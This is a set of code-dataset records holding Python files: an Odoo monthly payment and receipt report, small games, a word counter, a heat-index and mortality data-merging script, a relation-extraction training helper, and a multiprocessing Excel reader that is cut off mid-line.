\"tv_module.template_financial_analysis\")\n self.write({'result': html})\n return True\n\n @api.model\n def get_payment(self, from_date, to_date):\n payments = self.env['payment.voucher'].search([\n ('state', '=', 'paid'),\n ('paid_date', '>=', from_date),\n ('paid_date', '<=', to_date)])\n return payments\n\n @api.multi\n def get_receipt(self, from_date, to_date):\n receips = self.env['receipt.voucher'].search([\n ('state', '=', 'paid'),\n ('paid_date', '>=', from_date),\n ('paid_date', '<=', to_date)])\n return receips\n\n @api.multi\n def _get_data(self):\n ''' Get data from each month/ year\n '''\n self.ensure_one()\n from_year = self.from_year\n from_month = self.from_month\n from_date = from_year + from_month + '01'\n to_year = self.to_year\n to_month = self.to_month\n to_date = to_year + to_month + \\\n str(calendar.monthrange(int(to_year), int(to_month))[1])\n datas = {}\n month_data = {\n 1: {'payment': 0, 'receipt': 0},\n 2: {'payment': 0, 'receipt': 0},\n 3: {'payment': 0, 'receipt': 0},\n 4: {'payment': 0, 'receipt': 0},\n 5: {'payment': 0, 'receipt': 0},\n 6: {'payment': 0, 'receipt': 0},\n 7: {'payment': 0, 'receipt': 0},\n 8: {'payment': 0, 'receipt': 0},\n 9: {'payment': 0, 'receipt': 0},\n 10: {'payment': 0, 'receipt': 0},\n 11: {'payment': 0, 'receipt': 0},\n 12: {'payment': 0, 'receipt': 0},\n }\n if int(from_year) == int(to_year):\n month_data = {}\n for month in range(int(from_month), int(to_month) + 1):\n month_data.update({\n month: {'payment': 0, 'receipt': 0},\n })\n datas[int(from_year)] = month_data\n else:\n ''' Case from_month < from_year:\n Exp: 2017-06 -> 2018-04\n Data = from 2017-06 -> 2017-12 + 2018-01 -> 2018-04\n '''\n # Period from from_year\n month_from_from_year = {}\n for month in range(int(from_month), 13):\n month_from_from_year.update({\n month: {'payment': 0, 'receipt': 0},\n })\n datas[int(from_year)] = month_from_from_year\n month_from_to_year = {}\n for month in range(1, int(to_month)):\n month_from_to_year.update({\n month: {'payment': 0, 'receipt': 0},\n })\n datas[int(to_year)] = month_from_to_year\n for year in range(int(from_year) + 1, int(to_year)):\n datas.update({\n year: month_data\n })\n\n payments = self.get_payment(from_date, to_date)\n for payment in payments:\n paid_date_obj = datetime.strptime(\n payment.paid_date, DF)\n datas[paid_date_obj.year][paid_date_obj.month]['payment'] +=\\\n payment.amount\n receipts = self.get_receipt(from_date, to_date)\n for receipt in receipts:\n paid_date_obj = datetime.strptime(\n receipt.paid_date, DF)\n datas[paid_date_obj.year][paid_date_obj.month]['receipt'] +=\\\n receipt.amount\n\n # Calcualate Profit\n for year in datas:\n for month in datas[year]:\n payment = datas[year][month]['payment']\n receipt = datas[year][month]['receipt']\n datas[year][month]['profit'] = receipt - payment\n return datas\n\n","sub_path":"project/tv_module/models/financial/financial_analysis.py","file_name":"financial_analysis.py","file_ext":"py","file_size_in_byte":5734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"606099717","text":"from random import randint\n\noptions = [\"Piedra\", \"Papel\", \"Tijeras\"]\n\n# El resultado de salida son las siguientes String\n#'Empate!'\n#'Ganaste!'\n#'Perdiste!'\ndef quienGana(player, ai):\n\n resultPlaer = player.lower()\n resultAI = ai.lower()\n result = \"\"\n\n if (resultPlaer == \"papel\" and resultAI == \"piedra\") or (resultPlaer == \"piedra\" and resultAI == \"tijeras\") or (resultPlaer == \"tijeras\" and 
resultAI == \"papel\"):\n result = \"Ganaste!\"\n elif (resultPlaer == \"tijeras\" and resultAI == \"piedra\") or (resultPlaer == \"papel\" and resultAI == \"tijeras\") or (resultPlaer == \"piedra\" and resultAI == \"papel\"):\n result = \"Perdiste!\"\n else:\n result = \"Empate!\"\n\n return result\n\n# Entry Point\ndef Game():\n\n # player = input(\"Introduce piedra, papel o tijera: \")\n # ai = options[randint(0,2)]\n \n winner = quienGana(player, ai)\n\n print(winner)\n","sub_path":"src/kata1/rps.py","file_name":"rps.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"356980379","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport json\nwith open('anyueJson.json') as f:\n res= f.read()\n\njson_obj = json.loads(res)\nprint(json_obj)\nfor data in json_obj['data']['stations']:\n print(data)\n id = data['id']\n with open('anyue.txt','a') as f:\n f.write(id+'\\n')","sub_path":"other/chongDianZhuang/getId_anyue.py","file_name":"getId_anyue.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"102241669","text":"import random\n\n\nWORDS = (\"python\", \"jumble\", \"easy\", \"difficult\", \"answer\", \"xylophone\")\n\nword = random.choice(WORDS)\n\nwordLength = len(word)\n\nprint(\"There are %d letters in the word\" % wordLength)\n\ngoodGuess = []\n\nfor i in range(5):\n guess = input(\"Guess one of the letters in the word: \")\n\n if guess.lower() in word:\n print(\"Yes\")\n goodGuess.append(guess)\n else:\n print(\"No\")\nprint(\"Letters in the word:\", goodGuess)\nwordGuess = input(\"Guess the whole word: \")\n\nif wordGuess == word:\n print(\"You guessed it!\")\n\nelse:\n print(\"Incorrect\")\n wordGuess = input(\"Guess hte whole word: \")","sub_path":"chapter-4/challenge4.py","file_name":"challenge4.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"371352154","text":"import os\n\nimport gym\nimport torch\nimport numpy as np\nfrom torchvision import transforms\n\nfrom config_parser.config_parser import ConfigGenerator\n\nfrom torch_runner.experiment_setup import setup_experiment, load_config, get_run_path\nfrom torch_runner.data import transformers, file_loaders, generators\nfrom torch_runner.data.base import BasicDataSet, SequenceDataSet, SequenceDictDataSet\nfrom torch_runner.training_setup import setup_trainer\nfrom torch_runner.handlers import file_handler, tb_handler\n\nfrom trainer import MONetTrainer\nfrom models.monet_stove import MONetStove\n\nfrom get_model import get_model\nfrom util.data import generate_envs_data\nfrom util.envs import AvoidanceTask, BillardsEnv\n\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\n\nconfig, config_object = load_config()\nprint(config)\n\nload_run = config.EXPERIMENT.load_run\nrun_name = config.EXPERIMENT.run_name\nrun_number = config.EXPERIMENT.run_number\n\nif config.EXPERIMENT.random_seed:\n seed = np.random.randint(2**32 - 1)\n config_object.config_dict['EXPERIMENT']['seed'] = seed\n config_object.config_dict['EXPERIMENT']['random_seed'] = False\n np.random.seed(seed)\n torch.manual_seed(seed)\nelse:\n np.random.seed(config.EXPERIMENT.seed)\n torch.manual_seed(config.EXPERIMENT.seed)\n\nconfig, config_object = setup_experiment(config, config_object, debug=False)\nmonet = get_model(config, MONetStove, load_run, 
run_name, run_number).cuda()\n\nrun_path = get_run_path(\n config.EXPERIMENT.experiment_dir,\n config.EXPERIMENT.run_name,\n config.EXPERIMENT.run_number)\n\ndata_config = config.DATA\ntraining_config = config.TRAINING\n\nif config.EXPERIMENT.game == 'billards':\n env = AvoidanceTask(BillardsEnv(), action_force=0.6)\nelse:\n env = gym.make(config.EXPERIMENT.game)\n\nsource_loader = generators.FunctionLoader(\n generate_envs_data,\n {'env': env, 'num_runs': config.DATA.num_samples//500, 'run_len': 500})\n\n# name the list distinctly so it does not shadow the imported `transformers` module\ntransform_list = [\n transformers.TorchVisionTransformerComposition(config.DATA.transform, config.DATA.shape),\n transformers.TypeTransformer(config.EXPERIMENT.device)\n ]\n\ndata = SequenceDictDataSet(source_loader, transform_list, 8)\n\n\ntrainer = setup_trainer(MONetTrainer, monet, training_config, data)\n\ncheckpointing = file_handler.EpochCheckpointHandler(os.path.join(run_path, 'checkpoints'))\ntrainer.register_handler(checkpointing)\n\nregular_logging = file_handler.EpochFileHandler(os.path.join(run_path, 'data'), log_name_list=['imgs'])\ntrainer.register_handler(regular_logging)\n\ntb_logging_list = ['average_elbo', 'trans_lik', 'log_z_f', 'img_lik_forward', 'elbo', 'z_s', 'img_lik_mean', 'p_x_loss', 'p_x_loss_mean']\ntb_logger = tb_handler.NStepTbHandler(config.EXPERIMENT.log_every, run_path, 'logging', log_name_list=tb_logging_list)\ntrainer.register_handler(tb_logger)\n\nif config.EXPERIMENT.model == 'm-stove':\n trainer.model.img_model.init_background_weights(trainer.train_dataloader.dataset.get_all())\n\ntrainer.check_ready()\ntrainer.train(config.TRAINING.epochs, train_only=True, pretrain=config.TRAINING.pretrain, visdom=False)\n\nif config.TRAINING.pretrain:\n monet.img_model.beta = config.MODULE.MONET.beta\n trainer = setup_trainer(MONetTrainer, monet, training_config, data)\n \n checkpointing = file_handler.EpochCheckpointHandler(os.path.join(run_path, 'checkpoints'))\n trainer.register_handler(checkpointing)\n \n regular_logging = file_handler.EpochFileHandler(os.path.join(run_path, 'data'), log_name_list=['imgs'])\n trainer.register_handler(regular_logging)\n \n tb_logging_list = ['average_elbo', 'trans_lik', 'log_z_f', 'img_lik_forward', 'elbo', 'z_s', 'img_lik_mean', 'p_x_loss_mean']\n tb_logger = tb_handler.NStepTbHandler(config.EXPERIMENT.log_every, run_path, 'logging', log_name_list=tb_logging_list)\n trainer.register_handler(tb_logger)\n trainer.check_ready()\n trainer.train(config.TRAINING.epochs_stove, train_only=True, pretrain=False, visdom=False)\n","sub_path":"STOVETraining/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"4502753","text":"#Frederick Herzog\r\n# Python Word Count\r\n# 10/30/2020\r\n\r\nfrom re import sub\r\nfrom collections import Counter\r\nfrom os import system\r\n\r\ndef txt_WordsToList(file):\r\n\twith open(file, 'r') as f:\r\n\t\tdata = f.read().split()\r\n\t\treturn data\r\n\t\ndef removePunct(dat):\r\n\tcleandat = []\r\n\tfor word in dat:\r\n\t\tcleaned_word = sub('[^A-Za-z0-9]+', '', word)\r\n\t\tcleandat.append(cleaned_word)\r\n\treturn cleandat\r\n\r\ndef makeLowerCase(dat):\r\n\tlower_case = [w.lower() for w in dat]\r\n\treturn lower_case\r\n\r\ndef countWords(dat):\r\n\tcount = Counter\r\n\tc = count(dat)\r\n\treturn dict_to_tuples(c)\r\n\r\ndef dict_to_tuples(dat):\r\n\tfreq = []\r\n\tfor k, v in dat.items():\r\n\t\tfreq.append((v,k))\r\n\tfreq.sort(reverse = True)\r\n\treturn freq\r\n\r\ndef out_to_txt(dat, f):\r\n\twith open(f, 'w') as f:\r\n\t\tfor i in dat:\r\n\t\t\tf.write(' , 
'.join (str(s) for s in i) + '\\n')\n\ndef passtoDFS(f):\n\tpass\n\nif __name__ == '__main__':\n\tfile_path = \"Shakespeare.txt\"\n\toutput_file_path = \"count.txt\"\n\twords = txt_WordsToList(file_path)\n\twords_no_punct = removePunct(words)\n\tlower_c_words = makeLowerCase(words_no_punct)\n\tmy_count = countWords(lower_c_words)\n\tprint(my_count)\n\tout_to_txt(my_count, output_file_path)\n\n\t#passtoDFS(output_file_path)\n\n\n","sub_path":"code_snippets/DataDev/wordcounts/wrdcount.py","file_name":"wrdcount.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"279972856","text":"#!/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\n\nimport numpy as np\nimport pandas as pd\n\nPROJECT_DIR = \"/home/lee/heat\"\nDATA_DIR = os.path.join(PROJECT_DIR, \"raw-data\")\nRESULTS_DIR = os.path.join(PROJECT_DIR, \"results\")\nHI_DIR = os.path.join(RESULTS_DIR, \"hi-by-nuts3\")\nMORTALITY = os.path.join(DATA_DIR, \"demo_r_deaths_1_Data.csv\")\nAGE_DISTRIBUTION = os.path.join(DATA_DIR, \"demo_r_pjanaggr3_1_Data.csv\")\nOUTPUT_DIR = os.path.join(RESULTS_DIR, \"hi-mortality\")\nAGGREGATIONS = (\"minimum\", \"average\", \"maximum\")\nMETRICS = (\"danger-threshold-crossings\", \"longest-runs\", \"number-of-runs\")\nCSV_MAP = os.path.join(DATA_DIR, \"nuts-ids.csv\")\nMETRIC_MAPPINGS = {\"danger\": \"cross\",\n \"longest\": \"longrun\",\n \"number\": \"nrun\"}\nOUTPUT_PATH = os.path.join(OUTPUT_DIR, \"yearly-hi-stats-per-nuts3.csv\")\n\n\ndef read_eurostat_table(csv_file, usecols):\n \"\"\"\n Read Eurostat table with correct encoding, NA, thousand behavior, etc.\n\n As there are no relevant flags or footnotes, I discard them all.\n \"\"\"\n return pd.read_csv(csv_file, encoding=\"latin-1\", usecols=usecols,\n thousands=\",\", na_values=\":\")\n\n\ndef join_mortality_and_elderly_population() -> pd.DataFrame:\n \"\"\"\n Join tables of mortality and elderly population.\n\n The output dataframe contains total population and percentual elderly\n population and yearly mortality for all NUTS3 regions.\n \"\"\"\n mortality = read_eurostat_table(MORTALITY, range(3))\n age_dist = read_eurostat_table(AGE_DISTRIBUTION, range(5))\n age_dist = age_dist[age_dist.SEX == \"Total\"]\n # Now aggregate using AGE. 
You need 1 column for total population that you\n # keep, 1 column with proportion of population >= 65, and 1 column of\n # mortality for that year.\n grouped_by_age = age_dist.groupby(\"AGE\")\n # copy, so the column assignment below works on an independent frame\n total_population = grouped_by_age.get_group(\"Total\").copy()\n elderly_population = grouped_by_age.get_group(\"65 years or over\")\n elderly_proportion = (elderly_population.Value.values /\n total_population.Value.values)\n # Append elderly proportion column onto total population\n total_population[\"elderly\"] = elderly_proportion\n total_population = total_population[[\"TIME\", \"GEO\", \"Value\", \"elderly\"]]\n total_population.rename(columns={\"Value\": \"population\"}, inplace=True)\n mort_and_elderly_pop = pd.merge(total_population, mortality,\n on=[\"TIME\", \"GEO\"])\n mort_and_elderly_pop[\"mortality\"] = (mort_and_elderly_pop.Value.values /\n mort_and_elderly_pop.population.values)\n mort_and_elderly_pop.drop(\"Value\", axis=1, inplace=True)\n mort_and_elderly_pop.rename(columns={\"TIME\": \"year\", \"GEO\": \"region\"},\n inplace=True)\n output = os.path.join(OUTPUT_DIR, \"mortality-and-elderly-proportion.csv\")\n mort_and_elderly_pop.to_csv(output, encoding=\"utf-8\")\n return mort_and_elderly_pop\n\n\ndef clean_population(population: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n Replace region descriptions with NUTS IDs, drop unneeded rows and columns.\n \"\"\"\n ids_to_names = pd.read_csv(CSV_MAP, usecols=(2, 3))\n population = pd.merge(population, ids_to_names, left_on=\"region\",\n right_on=\"Description\")\n population.drop([\"region\", \"Description\"], 1, inplace=True)\n population.rename(columns={\"NUTS-Code\": \"nuts_id\"}, inplace=True)\n population.dropna(inplace=True)\n return population\n\n\ndef attach_heat_index(heat_index_files: list,\n population_df: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n Merge heat index and demographic dataframes.\n\n Some of the columns are boolean. This is because they measure the number of\n heat waves in which the minimum heat index exceeded a threshold for over 5\n days. Because this would mean that the nighttime heat index was at a\n dangerous level for at least 5 days in a row, this never occurred for any\n danger levels beyond \"caution\". For this reason, those columns are\n boolean. 
At the end of the function they're converted to ints.\n \"\"\"\n results = population_df.copy()\n for hi_file in heat_index_files:\n # No need to parse dates, they're stored as ints anyway\n hi_df = pd.read_csv(hi_file, index_col=0)\n stat, metric = os.path.basename(hi_file).split(\"-\")[:2]\n stat = stat[:3]\n metric = METRIC_MAPPINGS[metric]\n rename_dict = {\"extreme caution\": \"_\".join((stat, metric,\n \"ext_caution\")),\n \"extreme danger\": \"_\".join((stat, metric, \"ext_danger\")),\n \"caution\": \"_\".join((stat, metric, \"caution\")),\n \"danger\": \"_\".join((stat, metric, \"danger\"))}\n hi_df.rename(columns=rename_dict,\n inplace=True)\n results = pd.merge(results, hi_df, on=(\"nuts_id\", \"year\"))\n for col in results.columns[5:]:\n if results[col].dtype == np.bool:\n results[col] = results[col].astype(np.int64)\n return results\n\n\ndef main():\n population = clean_population(join_mortality_and_elderly_population())\n print(\"Cleaned population data.\")\n\n heat_index_files = []\n for metric in (\"minimum\", \"average\", \"maximum\"):\n heat_index_files += [os.path.join(HI_DIR,\n \"{}-{}.csv\".format(metric,\n aggregation))\n for aggregation in (\"danger-threshold-crossings\",\n \"longest-runs\",\n \"number-of-runs\")]\n\n print(\"Attaching heat index to population.\")\n results = attach_heat_index(heat_index_files, population)\n print(\"Writing results to {}.\".format(OUTPUT_PATH))\n results.to_csv(OUTPUT_PATH)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/3-hi-by-country/combine_hi_mortality.py","file_name":"combine_hi_mortality.py","file_ext":"py","file_size_in_byte":5949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"399175242","text":"# coding: utf-8\nfrom typing import Dict, List, Iterator\nimport torch\nimport random\nimport numpy as np\nimport os\nimport yaml\nimport json\nfrom misc.metrics import Accuracy\nfrom misc.constant import dirs_to_backup\n\n\nclass Functional(object):\n\n def __init__(self, params: Dict = None):\n self.__set_seed(params['randomseed'])\n self.params = params\n self.use_gpu = True if params['device'] == 'gpu' else False\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() and self.use_gpu else \"cpu\")\n\n self.checkpoint_dir = params['checkpoint_dir']\n self.summary_dir = params['summary_dir']\n self.log_dir = params['log_dir']\n self.data_path = params['data_path']\n self.bert_embedding_dir = params['bert_embedding_dir']\n self.backup = not params['not_backup'] if 'not_backup' in params else None\n\n self.dataset = params['dataset']\n self.train_prefix = params['train_prefix']\n self.test_prefix = params['test_prefix']\n\n self.use_bert_embedding = params['use_bert_embedding']\n self.bert_embedd_dim = 768\n if self.use_bert_embedding:\n print('Use bert embedding...')\n self.bert_embedd_dim = params['bert_embedd_dim']\n self.embedd_dim = params['embedd_dim']\n self.freeze_embedd = params['freeze_embedd']\n self.drop_word = params['drop_word'] if 'drop_word' in params else None\n self.dis_size = params['dis_size'] if 'dis_size' in params else None\n self.coref_size = params['coref_size'] if 'coref_size' in params else None\n self.entity_type_size = params['entity_type_size'] if 'entity_type_size' in params else None\n self.nlayer = params['nlayer'] if 'nlayer' in params else None\n self.cat_nlayer = params['cat_nlayer'] if 'cat_nlayer' in params else None\n self.hidden_size = params['hidden_size'] if 'hidden_size' in params else None\n 
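# note: each `params['x'] if 'x' in params else None` in this block is equivalent to `params.get('x')`; the original spelling is kept to avoid touching behavior\n        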
self.lstm_keep_prob = params['lstm_keep_prob'] if 'lstm_keep_prob' in params else None # for lstm\n self.entity_span_pooling = params['entity_span_pooling'] if 'entity_span_pooling' in params else None\n self.coref_pooling = params['coref_pooling'] if 'coref_pooling' in params else None # For Baseline BiLSTM-M, default `mean`\n self.which_model = params['which_model'] if 'which_model' in params else None\n\n self.mutual_attender = params['mutual_attender'] if 'mutual_attender' in params else None\n self.integration_attender = params['integration_attender'] if 'integration_attender' in params else None\n self.use_bilinear = params['use_bilinear'] if 'use_bilinear' in params else None\n self.use_distance = params['use_distance'] if 'use_distance' in params else None\n self.use_overlap = params['use_overlap'] if 'use_overlap' in params else None\n self.bi_affine_dropout = params['bi_affine_dropout'] if 'bi_affine_dropout' in params else None\n\n self.max_epoch = params['max_epoch'] if 'max_epoch' in params else None\n self.init_lr = params['init_lr'] if 'init_lr' in params else None\n self.batch_size = params['batch_size'] if 'batch_size' in params else None\n self.train_h_t_limit = params['train_rel_limit_per_example'] if 'train_rel_limit_per_example' in params else None\n self.test_batch_size = params['test_batch_size'] if params['test_batch_size'] else self.batch_size\n self.exp_id = params['exp_id']\n self.test_relation_limit = params['test_rel_limit_per_example'] if 'test_rel_limit_per_example' in params else None\n self.use_lr_scheduler = params['use_lr_scheduler'] if 'use_lr_scheduler' in params else None\n self.use_neg_sample = params['use_neg_sample'] if 'use_neg_sample' in params else None\n self.neg_sample_multiplier = params['neg_sample_multiplier'] if 'neg_sample_multiplier' in params else None\n\n self.debug_test = params['debug_test']\n self.write_weights = params['write_weights']\n self.epoch_start_to_eval = params['epoch_start_to_eval']\n\n self.pretrain_model = None\n self.model_loaded_from_epoch = None\n self.coref_only = False\n self.use_sample_weight = False\n self.accumulation_steps = 1\n # if self.use_neg_sample:\n # self.train_h_t_limit = 70 * (self.neg_sample_multiplier + 1) # 70: max num_rels of train (and dev)\n\n self.max_length = params['max_length']\n self.relation_num = params['relation_num']\n self.entity_type_num = params['entity_type_num']\n self.pos_num = 2 * self.max_length\n self.entity_num = self.max_length\n self.dis2idx = self._get_dis2idx()\n self.period = 50\n\n for _dir in [self.log_dir, self.checkpoint_dir, self.summary_dir]:\n if not os.path.exists(_dir):\n os.mkdir(_dir)\n\n self.logging(self.exp_id)\n self.id2word = json.load(open(os.path.join(self.data_path, 'word2id.json')))\n self.id2word = {idx: word for word, idx in self.id2word.items()}\n\n self.input_theta_of_best_epoch = -1\n self.acc_NA = Accuracy()\n self.acc_not_NA = Accuracy()\n self.acc_total = Accuracy()\n self.best_scores = {\n 'main_metric': {\n 'ign_f1': 0.0,\n 'epoch': 0,\n 'auc': 0.0\n },\n 'auc': 0.0,\n 'ign_coref_f1': 0.0,\n 'ign_non_coref_f1': 0.0\n }\n\n self.num_train_entity_pairs = 0\n self.num_pos_entity_pairs = None\n self.num_neg_entity_pairs = None\n self.num_test_entity_pairs = None\n\n def print_train_num_pos_neg(self):\n self.logging(f\"num_train_entity_pairs: {self.num_train_entity_pairs}. 
\"\n f\"use_neg_sample: {self.use_neg_sample}; #P:#N=1:{self.neg_sample_multiplier}\"\n f\" = {self.num_pos_entity_pairs}:{self.num_neg_entity_pairs}\")\n\n def print_test_num_entity_pairs(self):\n self.logging(f\"num_test_entity_pairs: {self.num_test_entity_pairs}. \")\n\n def __set_seed(self, randomseed):\n torch.manual_seed(randomseed)\n torch.cuda.manual_seed(randomseed)\n torch.cuda.manual_seed_all(randomseed)\n random.seed(randomseed)\n np.random.seed(randomseed)\n torch.backends.cudnn.deterministic = True\n\n def logging(self, s, print_=True, log_=True):\n if print_:\n print(s)\n if log_:\n with open(os.path.join(os.path.join(\"log\", self.exp_id)), 'a+', encoding='utf8') as f_log:\n f_log.write(s + '\\n')\n\n def set_on_cpu(self):\n self.use_gpu = False\n self.device = torch.device(\"cpu\")\n\n def backup_codes(self):\n from shutil import copy as sh_copy, copytree as sh_cptree\n import os\n\n def ignore(src, names):\n return ['__pycache__']\n # backup dirs\n backup_dir = f\"./{self.summary_dir}/{self.exp_id}\"\n for _dir in dirs_to_backup:\n sh_cptree(_dir, f\"./{backup_dir}/{_dir}\", ignore=ignore)\n # backup ./*.py\n for _file in os.listdir('./'):\n if _file.endswith('.py'):\n sh_copy(f\"./{_file}\", f\"./{backup_dir}/{_file}\")\n # backup params\n _file = os.path.basename(self.params['param_file'])\n yaml.dump(self.params, open(f\"{backup_dir}/{self.exp_id}___{_file}\", 'w'))\n\n def visualize_data(self, prefix, data, n=1, max_len=30):\n def to_np(from_data, dtype='int32'):\n return from_data.cpu().numpy().astype(dtype).tolist()\n for i in range(n):\n try:\n # print(f\"{prefix}_index: {data['indexes'][i]}\")\n self.logging(f\"{prefix}_index: {data['indexes'][i]}\", log_=(i == 0))\n if 'context_idxs' in data:\n context_idxs = to_np(data['context_idxs'][i])\n tokens_str = ' '.join([self.id2word[idx] for idx in context_idxs[:max_len]])\n self.logging(f\"tokens: {tokens_str}\", log_=(i == 0))\n if 'context_pos' in data:\n context_pos = to_np(data['context_pos'][i][:max_len])\n print(f\"context_pos (coref): {context_pos}\")\n if 'for_relation_repr' in data:\n for_relation_repr = data['for_relation_repr']\n if 'entity_span_indices' in for_relation_repr:\n entity_span_indices = to_np(for_relation_repr['entity_span_indices'][i][:5])\n print(f\"entity_span_indices: {entity_span_indices}\")\n if 'ht_pair_pos' in data:\n print(f\"ht_pair_pos size : {data['ht_pair_pos'].size()}\")\n print('one sample (part):')\n to_print = to_np(data['ht_pair_pos'][i][:5])\n if isinstance(to_print[0], list):\n for item in to_print:\n print(item)\n else:\n print(to_print)\n except IndexError as indexE:\n break\n\n def padding(self, X, max_len, dim):\n return np.concatenate([\n X, np.zeros((max_len-X.shape[0], dim))\n ])\n\n def _get_dis2idx(self):\n values = np.zeros((self.max_length), dtype='int64')\n values[1] = 1\n values[2:] = 2\n values[4:] = 3\n values[8:] = 4\n values[16:] = 5\n values[32:] = 6\n values[64:] = 7\n values[128:] = 8\n values[256:] = 9\n return values\n\n def get_head_tail_relative_pos(self, head, tail) -> int:\n delta_dis = head['pos'][0] - tail['pos'][0]\n if delta_dis < 0:\n relative_pos_idx = -int(self.dis2idx[-delta_dis])\n else:\n relative_pos_idx = int(self.dis2idx[delta_dis])\n return relative_pos_idx\n\n def set_max_epoch(self, max_epoch):\n self.max_epoch = max_epoch\n\n def _compute_acc(self, relation_label, output) -> None:\n for i in range(output.shape[0]):\n for j in range(output.shape[1]):\n label = relation_label[i][j]\n if label < 0:\n break\n if label == 0:\n 
self.acc_NA.add(output[i][j] == label)\n else:\n self.acc_not_NA.add(output[i][j] == label)\n self.acc_total.add(output[i][j] == label)\n\n def _to_tensor(self, data, dtype='float'):\n assert dtype in ['float', 'long', 'bool']\n if dtype == 'float':\n return torch.Tensor(data).to(self.device)\n elif dtype == 'long':\n return torch.LongTensor(data).to(self.device)\n elif dtype == 'bool':\n return torch.BoolTensor(data).to(self.device)\n\n def format_params(self, params) -> List[str]:\n config_lines = list()\n for attr in params:\n try:\n value = self.__getattribute__(attr)\n if value is not None:\n config_lines.append(\"{:<23}: {}\\n\".format(attr, value))\n except AttributeError:\n continue\n return config_lines\n\n def get_format_params_end_line(self):\n return f\"{'='*48}\\n\\n\"\n\n def get_train_batch(self) -> Iterator[Dict]:\n raise NotImplementedError\n\n def get_test_batch(self) -> Iterator[Dict]:\n raise NotImplementedError\n\n def check_get_batches(self):\n print(\"start get_train_batches ...\")\n for data in self.get_train_batch():\n pass\n print(\"get_train_batches ends.\")\n print(\"start get_test_batches ...\")\n for data in self.get_test_batch():\n pass\n print(\"get_test_batches ends.\")\n\n def get_config_str(self) -> str:\n params = ['dataset', 'train_prefix', 'test_prefix', 'max_length', 'use_bert_embedding',\n 'bert_embedd_dim', 'embedd_dim', 'freeze_embedd', 'drop_word', 'nlayer', 'cat_nlayer',\n 'hidden_size', 'which_model', 'mutual_attender', 'integration_attender', 'bi_affine_dropout',\n 'use_distance', 'use_overlap', 'use_bilinear', 'batch_size', 'init_lr', 'use_lr_scheduler',\n 'train_h_t_limit', 'test_batch_size', 'test_relation_limit',\n 'max_epoch', 'epoch_start_to_eval', 'use_neg_sample', 'neg_sample_multiplier']\n # Make sure that params have the same name with the property.\n # E.g., 'dataset' --> self.dataset\n # `format_params` will call self.__getattribute__(param)\n config_lines = list()\n config_lines.append(f\"{'='*18} Parameters {'='*18}\\n\")\n config_lines.extend(self.format_params(params))\n return \"\".join(config_lines)\n\n\n","sub_path":"trainer/functional.py","file_name":"functional.py","file_ext":"py","file_size_in_byte":12690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"76643495","text":"'''\r\n@author: xusheng\r\n'''\r\n\r\nfrom multiprocessing import Process, Queue\r\nimport os, time, random\r\nimport xlrd\r\nimport xlwt\r\nfrom six.moves import xrange\r\nimport argparse\r\n\r\nclass DataObject(object):\r\n @property\r\n def order_date(self):\r\n return self._order_date\r\n \r\n @order_date.setter\r\n def order_date(self, value):\r\n self._order_date = value\r\n \r\n @property\r\n def insurance_name(self):\r\n return self._insurance_name\r\n \r\n @insurance_name.setter\r\n def insurance_name(self, value):\r\n self._insurance_name = value\r\n \r\n @property\r\n def insurance_type(self):\r\n return self._insurance_type\r\n \r\n @insurance_type.setter\r\n def insurance_type(self, value):\r\n self._insurance_type = value\r\n\r\n @property\r\n def insurance_premium(self):\r\n return self._insurance_premium\r\n \r\n @insurance_premium.setter\r\n def insurance_premium(self, value):\r\n self._insurance_premium = value\r\n\r\n @property\r\n def insurance_commission(self):\r\n return self._insurance_commission\r\n \r\n @insurance_commission.setter\r\n def insurance_commission(self, value):\r\n self._insurance_commission = value\r\n \r\n @property\r\n def staff_no(self):\r\n return 
self._staff_no\r\n \r\n @staff_no.setter\r\n def staff_no(self, value):\r\n self._staff_no = value\r\n\r\nclass VProcess(Process):\r\n def __init__(self, name, queue, path):\r\n Process.__init__(self, name=name)\r\n self._queue = queue\r\n self._path = path\r\n\r\nclass QueueWriteProcess(VProcess):\r\n def _preprocess_date(self, ctype, value):\r\n # ctype: 0 empty, 1 string, 2 number, 3 date, 4 boolean, 5 error\r\n val = value\r\n if ctype == 0:\r\n pass\r\n elif ctype == 1:\r\n val = val.replace('.', '-') # normalise dotted date strings such as 2018.06.05 to 2018-06-05\r\n elif ctype == 2:\r\n pass\r\n elif ctype == 3:\r\n val = xlrd.xldate.xldate_as_datetime(val, 0)\r\n val = val.strftime(\"%Y-%m-%d\")\r\n elif ctype == 4:\r\n pass\r\n else:\r\n pass\r\n \r\n return val\r\n \r\n def run(self):\r\n print('[->| ] PID [%s]: %s is running...' % (os.getpid(), self.name))\r\n titleIncluded = 1\r\n \r\n filelist = os.listdir(self._path)\r\n# filelist = [f for f in os.listdir(os.path.join('..', 'data', 'insurance', 'raw')) if f.endswith(\".xls\") or f.endswith(\".xlst\")]\r\n for file in filelist:\r\n workbook = xlrd.open_workbook(os.path.join(self._path, file))\r\n print('[->| ] Workbook [%s] Begin' % (file))\r\n sheets = workbook.sheets()\r\n for sheet in sheets:\r\n nrows = sheet.nrows\r\n print('[->| ] Sheet [%s].[%s], Rows [%d] Begin' % (file, sheet.name, (nrows + 1 - titleIncluded)))\r\n # insurance_type, insurance_name, order_date, insurance_premium, insurance_commission, staff_no\r\n offsets = [1, 2, 7, 